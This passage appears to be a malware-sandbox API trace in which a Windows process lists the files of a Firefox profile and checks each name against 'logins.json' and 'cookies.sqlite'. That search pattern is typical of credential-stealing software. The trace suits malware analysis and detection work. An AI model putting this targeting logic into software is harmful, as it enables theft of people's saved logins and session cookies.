lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81fbde30, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x81fbde30, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x81fbde30, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0x0, dwReserved1=0x0, cFileName="pluginreg.dat", cAlternateFileName="PLUGIN~1.DAT")) returned 1 [0161.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.224] lstrlenW (lpString="\\") returned 1 [0161.224] GetProcessHeap () returned 0x8e0000 [0161.225] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.225] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.225] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.225] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.225] lstrlenW (lpString="pluginreg.dat") returned 13 [0161.225] GetProcessHeap () returned 0x8e0000 [0161.225] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.225] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.225] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="pluginreg.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" [0161.225] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.225] GetProcessHeap () returned 0x8e0000 [0161.225] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.225] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat", lpSrch="logins.json") returned 0x0 [0161.225] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat", lpSrch="cookies.sqlite") returned 0x0 [0161.225] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.225] GetProcessHeap () returned 0x8e0000 [0161.225] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.225] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84c85c10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x853f60d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x12069be0, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0xfde, dwReserved0=0x0, dwReserved1=0x0, cFileName="prefs.js", cAlternateFileName="")) returned 1 [0161.225] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.225] lstrlenW (lpString="\\") returned 1 [0161.225] GetProcessHeap () returned 0x8e0000 [0161.225] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.225] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.225] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.225] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.225] lstrlenW (lpString="prefs.js") returned 8 [0161.225] GetProcessHeap () returned 0x8e0000 [0161.225] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x925780 [0161.225] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.225] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="prefs.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" [0161.225] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.225] GetProcessHeap () returned 0x8e0000 [0161.225] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.225] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js", lpSrch="logins.json") returned 0x0 [0161.225] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js", lpSrch="cookies.sqlite") returned 0x0 [0161.226] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.226] GetProcessHeap () returned 0x8e0000 [0161.226] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.226] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6fa8c70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6fa8c70, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb6fa8c70, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x4183, dwReserved0=0x0, dwReserved1=0x0, cFileName="search.json", cAlternateFileName="SEARCH~1.JSO")) returned 1 [0161.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.226] lstrlenW (lpString="\\") returned 1 [0161.226] GetProcessHeap () returned 0x8e0000 [0161.226] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.226] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.226] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.226] lstrlenW (lpString="search.json") returned 11 [0161.226] GetProcessHeap () returned 0x8e0000 [0161.226] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x925780 [0161.226] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.226] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="search.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" [0161.226] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.226] GetProcessHeap () returned 0x8e0000 [0161.226] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.226] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json", lpSrch="logins.json") returned 0x0 [0161.226] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json", lpSrch="cookies.sqlite") returned 0x0 [0161.226] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.226] GetProcessHeap () returned 0x8e0000 [0161.226] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.226] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb477d930, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb477d930, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb47c9bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="secmod.db", cAlternateFileName="")) returned 1 [0161.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.226] lstrlenW (lpString="\\") returned 1 [0161.226] GetProcessHeap () returned 0x8e0000 [0161.226] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.226] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.226] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.226] lstrlenW (lpString="secmod.db") returned 9 [0161.226] GetProcessHeap () returned 0x8e0000 [0161.226] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x925780 [0161.227] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.227] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="secmod.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" [0161.227] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.227] GetProcessHeap () returned 0x8e0000 [0161.227] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.227] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db", lpSrch="logins.json") returned 0x0 [0161.227] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db", lpSrch="cookies.sqlite") returned 0x0 [0161.227] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.227] GetProcessHeap () returned 0x8e0000 [0161.227] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.227] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc3787480, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3787480, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="sessionstore.bak", cAlternateFileName="SESSIO~1.BAK")) returned 1 [0161.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.227] lstrlenW (lpString="\\") returned 1 [0161.227] GetProcessHeap () returned 0x8e0000 [0161.227] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.227] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.227] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.227] lstrlenW (lpString="sessionstore.bak") returned 16 [0161.227] GetProcessHeap () returned 0x8e0000 [0161.227] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x925780 [0161.227] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.227] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.bak" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" [0161.227] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.227] GetProcessHeap () returned 0x8e0000 [0161.227] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.227] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak", lpSrch="logins.json") returned 0x0 [0161.227] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak", lpSrch="cookies.sqlite") returned 0x0 [0161.227] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.227] GetProcessHeap () returned 0x8e0000 [0161.227] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.227] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x84e029d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x84e029d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="sessionstore.js", cAlternateFileName="SESSIO~1.JS")) returned 1 [0161.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.228] lstrlenW (lpString="\\") returned 1 [0161.228] GetProcessHeap () returned 0x8e0000 [0161.228] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.228] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.228] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.228] lstrlenW (lpString="sessionstore.js") returned 15 [0161.228] GetProcessHeap () returned 0x8e0000 [0161.228] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0161.228] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.228] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" [0161.228] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.228] GetProcessHeap () returned 0x8e0000 [0161.228] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.228] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js", lpSrch="logins.json") returned 0x0 [0161.228] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js", lpSrch="cookies.sqlite") returned 0x0 [0161.228] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.228] GetProcessHeap () returned 0x8e0000 [0161.228] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.228] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb6f36850, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x50000, dwReserved0=0x0, dwReserved1=0x0, cFileName="signons.sqlite", cAlternateFileName="SIGNON~1.SQL")) returned 1 [0161.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.228] lstrlenW (lpString="\\") returned 1 [0161.228] GetProcessHeap () returned 0x8e0000 [0161.228] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.228] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: 